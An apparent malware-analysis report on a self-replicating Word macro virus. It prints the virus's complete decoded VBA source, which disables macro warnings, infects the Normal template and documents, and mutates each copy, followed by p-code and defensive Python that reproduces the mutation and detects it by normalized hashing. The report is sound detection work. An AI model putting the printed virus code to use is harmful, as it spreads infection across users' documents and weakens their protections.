Verdict: MALICIOUS
Risk Score: 120
Malware Insights
MITRE ATT&CK: T1059.005 Command and Scripting Interpreter: Visual Basic
The sample is a Microsoft Word document with a high-confidence detection for VBA macros and a critical ClamAV detection (Doc.Trojan.Liar-5). The embedded VBA module (ThisDocument, carved as macros.bas) runs from a document_open handler and is a self-replicating macro virus of the classic Word 97 type rather than a downloader. On open it sets Options.VirusProtection to 0 (silencing Word's macro warning), resets the file attributes of the Normal template with SetAttr so it can be written, reads its own source back through the VBA Extensibility object model (MacroContainer.VBProject.VBComponents(1).CodeModule) and writes a copy into the target module with AddFromString. The target depends on where it is running: from the Normal template it infects the active document with a document_open handler; from a document it infects the Normal template with a document_close handler and saves it. Each copy is mutated on the way: the code portion of every line is upper-cased and letters B to Y are lower-cased at random, and every line gets a trailing apostrophe followed by 55 to 75 characters in the Chr(156) to Chr(255) range; extra junk comment lines are inserted at random and dropped again once the module exceeds 100 lines, which keeps the growth bounded. The effect is that every generation has a different byte-level hash while the logic is unchanged. The only payload in the listing is cosmetic: on the 25th to 30th of the month (25 + Int(Rnd * 6)) it inserts the string "l0 julie, wassup?" at the current selection. Nothing in the extracted source downloads or executes a second-stage payload; the trailing Rem lines identify it as Class97Macro.julie by jack twoflower [LineZero & Metaphase].
Heuristics (3)
- ClamAV: Doc.Trojan.Liar-5 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Trojan.Liar-5
- VBA macros detected [medium] (OLE_VBA_MACROS): Document contains VBA macro code (1 related finding)
- Document_Open macro [high] (OLE_VBA_DOCOPEN): Document_Open macro
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7991 bytes | 896a202a7b21de8f1ff801ed1049a9ef75df8ccf93f3eb78f3bf99ccbbdaa208 |
Preview script (first 1,000 lines of the extracted script):
```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub document_open() '
Dim v(150): Options.VirusProtection = (Rnd * 0) '
SetAttr NormalTemplate.FullName, vbNormal '
Set a = MacroContainer.VBProject: Set ab = a.VBComponents(1) '
Set abc = ab.CodeModule: Set s = NormalTemplate: t = Chr(39) '
Set nh = s.VBProject.VBComponents(1).CodeModule '
For y = 1 To Int(75 - (Rnd * 20)): vx = vx & Chr(255 - Int(Rnd * 100)): Next y '
vc = "Private Sub document_close()" & t & vx & vbCr '
If MacroContainer = NormalTemplate Then '
Set s = ActiveDocument: Set nh = s.VBProject.VBComponents(1).CodeModule '
vc = "Private Sub document_open()" & t & vx & vbCr '
End If: lin = abc.countoflines '
For i = 2 To lin '
jc = "": d = Int(Rnd * 3): p = InStr(abc.Lines(i, 1), t) '
If p = 0 Then GoTo e_ '
If p = 1 And lin > 100 Then '
d = 1: GoTo n_ '
End If '
l = UCase(Left(abc.Lines(i, 1), (p - 1))) '
For o = 1 To Len(l) '
f = Mid(l, o, 1) '
If Asc(f) < 90 And Asc(f) > 65 Then f = Chr(Asc(f) + Int(Rnd * 2) * 32) '
v(i) = v(i) & f '
Next o '
For j = 1 To Int(75 - (Rnd * 20)) '
jc = jc & Chr(255 - Int(Rnd * 100)) '
Next j '
v(i) = v(i) & t & jc '
If d = 2 Then v(i) = v(i) & vbCr & t & jc '
vc = vc & v(i) & vbCr '
n_: '
Next i '
e_: '
If nh.countoflines < (1 + 1) Then '
nh.addfromstring vc: s.Save '
End If '
If Day(Now()) = (25 + Int(Rnd * 6)) Then Selection.InsertAfter "l0 julie, wassup?" '
End Sub '
Rem Class97Macro.julie - dedicated to julie ;) '
Rem Another virus by jack twoflower [LineZero & Metaphase] '
' Processing file: /opt/analyzer/scan_staging/cae8c65388474ed9be298f43513fd49f.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 3979 bytes
' Line #0:
'     FuncDefn (Private Sub document_open())
'     QuoteRem 0x001C 0x0000 ""
' Line #1:
'     Dim
'     OptionBase
'     LitDI2 0x0096
'     VarDefn v
'     BoS 0x0000
'     Ld Rnd
'     LitDI2 0x0000
'     Mul
'     Paren
'     Ld Options
'     MemSt VirusProtection
'     QuoteRem 0x0030 0x0000 ""
' Line #2:
'     Ld NormalTemplate
'     MemLd FullName
'     Ld vbNormal
'     ArgsCall SetAttr 0x0002
'     QuoteRem 0x002A 0x0000 ""
' Line #3:
'     SetStmt
'     Ld MacroContainer
'     MemLd VBProject
'     Set a
'     BoS 0x0000
'     SetStmt
'     LitDI2 0x0001
'     Ld a
'     ArgsMemLd VBComponents 0x0001
'     Set ab
'     QuoteRem 0x003D 0x0000 ""
' Line #4:
'     SetStmt
'     Ld ab
'     MemLd CodeModule
'     Set abc
'     BoS 0x0000
'     SetStmt
'     Ld NormalTemplate
'     Set s
'     BoS 0x0000
'     LitDI2 0x0027
'     ArgsLd Chr 0x0001
'     St t
'     QuoteRem 0x003D 0x0000 ""
' Line #5:
'     SetStmt
'     LitDI2 0x0001
'     Ld s
'     MemLd VBProject
'     ArgsMemLd VBComponents 0x0001
'     MemLd CodeModule
'     Set nh
'     QuoteRem 0x0030 0x0000 ""
' Line #6:
'     StartForVariable
'     Ld y
'     EndForVariable
'     LitDI2 0x0001
'     LitDI2 0x004B
'     Ld Rnd
'     LitDI2 0x0014
'     Mul
'     Paren
'     Sub
'     FnInt
'     For
'     BoS 0x0000
'     Ld vx
'     LitDI2 0x00FF
'     Ld Rnd
'     LitDI2 0x0064
'     Mul
'     FnInt
'     Sub
'     ArgsLd Chr 0x0001
'     Concat
'     St vx
'     BoS 0x0000
'     StartForVariable
'     Ld y
'     EndForVariable
'     NextVar
'     QuoteRem 0x004F 0x0000 ""
' Line #7:
'     LitStr 0x001C "Private Sub document_close()"
'     Ld t
'     Concat
'     Ld vx
'     Concat
'     Ld vbCr
'     Concat
'     St vc
'     QuoteRem 0x0035 0x0000 ""
' Line #8:
'     Ld MacroContainer
'     Ld NormalTemplate
'     Eq
'     IfBlock
'     QuoteRem 0x0028 0x0000 ""
' Line #9:
'     SetStmt
'     Ld ActiveDocument
'     Set s
'     BoS 0x0000
'     SetStmt
'     LitDI2 0x0001
'     Ld s
'     MemLd VBProject
'     ArgsMemLd VBComponents 0x0001
'     MemLd CodeModule
'     Set nh
'     QuoteRem 0x0048 0x0000 ""
' Line #10:
'     LitStr 0x001B "Private Sub document_open()"
'     Ld t
'     Concat
'     Ld vx
'     Concat
'     Ld vbCr
'     Concat
'     St vc
'     QuoteRem 0x0033 0x0000 ""
' Line #11:
'     EndIfBlock
'     BoS 0x0000
'     Ld abc
'     MemLd countoflin ... (truncated)
```
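As an added example (reference code written for this report, not the analyzer's code and not part of the sample), the Python below re-implements the two transforms the engine applies to every line it copies, random case changes in the code and a fresh run of high-byte junk behind a trailing apostrophe, and shows why a file hash is useless against it: a normalization step that strips comments, upper-cases and collapses whitespace makes every generation hash to the same value, and that normalized text is where indicator matching should run. The macro excerpt is taken from the listing above; the benign macro, the indicator lists and all function names are assumptions made for the demonstration.

```python
"""Normalize a VBA module so the case-flip / junk-comment mutation used by the
extracted macro no longer changes the result, then match replication
indicators on the normalized text.  Example code for this report, not part of
the analyzer or of the sample."""
import hashlib
import random
import re

# Excerpt of the extracted source as it appears in the listing (trailing
# apostrophes kept).  Constructed input for the demonstration.
SAMPLE = """Private Sub document_open() '
Dim v(150): Options.VirusProtection = (Rnd * 0) '
SetAttr NormalTemplate.FullName, vbNormal '
Set a = MacroContainer.VBProject: Set ab = a.VBComponents(1) '
Set abc = ab.CodeModule: Set s = NormalTemplate: t = Chr(39) '
Set nh = s.VBProject.VBComponents(1).CodeModule '
If nh.countoflines < (1 + 1) Then '
nh.addfromstring vc: s.Save '
End If '
If Day(Now()) = (25 + Int(Rnd * 6)) Then Selection.InsertAfter "l0 julie, wassup?" '
End Sub '
Rem Class97Macro.julie - dedicated to julie ;) '
"""

# Constructed benign macro for comparison (not from the sample).
BENIGN = """Sub FormatReport()
    ActiveDocument.Paragraphs(1).Range.Font.Bold = True
End Sub
"""

# Indicator vocabulary (assumed for this example): the object-model calls a
# macro needs to read and rewrite VBA source, plus the auto-exec handlers that
# give it a trigger.  Everything is compared in upper case.
REPLICATION_INDICATORS = ("VBPROJECT", "VBCOMPONENTS", "CODEMODULE",
                          "ADDFROMSTRING", "NORMALTEMPLATE",
                          "OPTIONS.VIRUSPROTECTION")
AUTO_EXEC = ("DOCUMENT_OPEN", "DOCUMENT_CLOSE", "AUTOOPEN", "AUTOCLOSE")


def strip_comment(line: str) -> str:
    """Drop everything from the first apostrophe that is not inside a string literal."""
    in_str = False
    for i, ch in enumerate(line):
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            return line[:i]
    return line


def normalize(src: str) -> str:
    """Comment-free, upper-cased, whitespace-collapsed form of the module."""
    out = []
    for line in src.splitlines():
        code = re.sub(r"\s+", " ", strip_comment(line)).strip().upper()
        if code and not code.startswith("REM "):
            out.append(code)
    return "\n".join(out)


def mutate(src: str, seed: int) -> str:
    """Re-implementation of the engine's per-line transform from the listing:
    upper-case the code, lower-case letters B..Y at random (Asc between 65 and
    90 exclusive, + 32 with probability 1/2), then append an apostrophe and
    55..75 characters drawn from Chr(156)..Chr(255)."""
    rng = random.Random(seed)
    lines = []
    for line in src.splitlines():
        code = strip_comment(line).upper()
        flipped = "".join(chr(ord(c) + 32 * rng.randint(0, 1)) if 65 < ord(c) < 90 else c
                          for c in code)
        junk = "".join(chr(255 - rng.randrange(100)) for _ in range(rng.randint(55, 75)))
        lines.append(flipped + "'" + junk)
    return "\n".join(lines)


def scan(src: str) -> dict:
    """Verdict for one module, keyed on the normalized text rather than the raw bytes."""
    norm = normalize(src)
    found = [k for k in REPLICATION_INDICATORS if k in norm]
    triggers = [k for k in AUTO_EXEC if k in norm]
    return {
        "normalized_sha256": hashlib.sha256(norm.encode("utf-8")).hexdigest(),
        "replication_indicators": found,
        "auto_exec_triggers": triggers,
        # Needs a trigger plus the ability to read and rewrite a module.
        "self_replicating": bool(triggers) and {"VBPROJECT", "ADDFROMSTRING"} <= set(found),
    }


if __name__ == "__main__":
    generation2 = mutate(SAMPLE, 2024)
    print(scan(SAMPLE))
    print("raw bytes differ:", generation2 != SAMPLE)
    print("normalized hash equal:",
          scan(generation2)["normalized_sha256"] == scan(SAMPLE)["normalized_sha256"])
```

In practice the input comes from olevba (the vba_code value yielded by VBA_Parser.extract_macros()), one module at a time; the point of the normalized hash is that it, not the SHA-256 of macros.bas, is the value worth sharing as an indicator for this family.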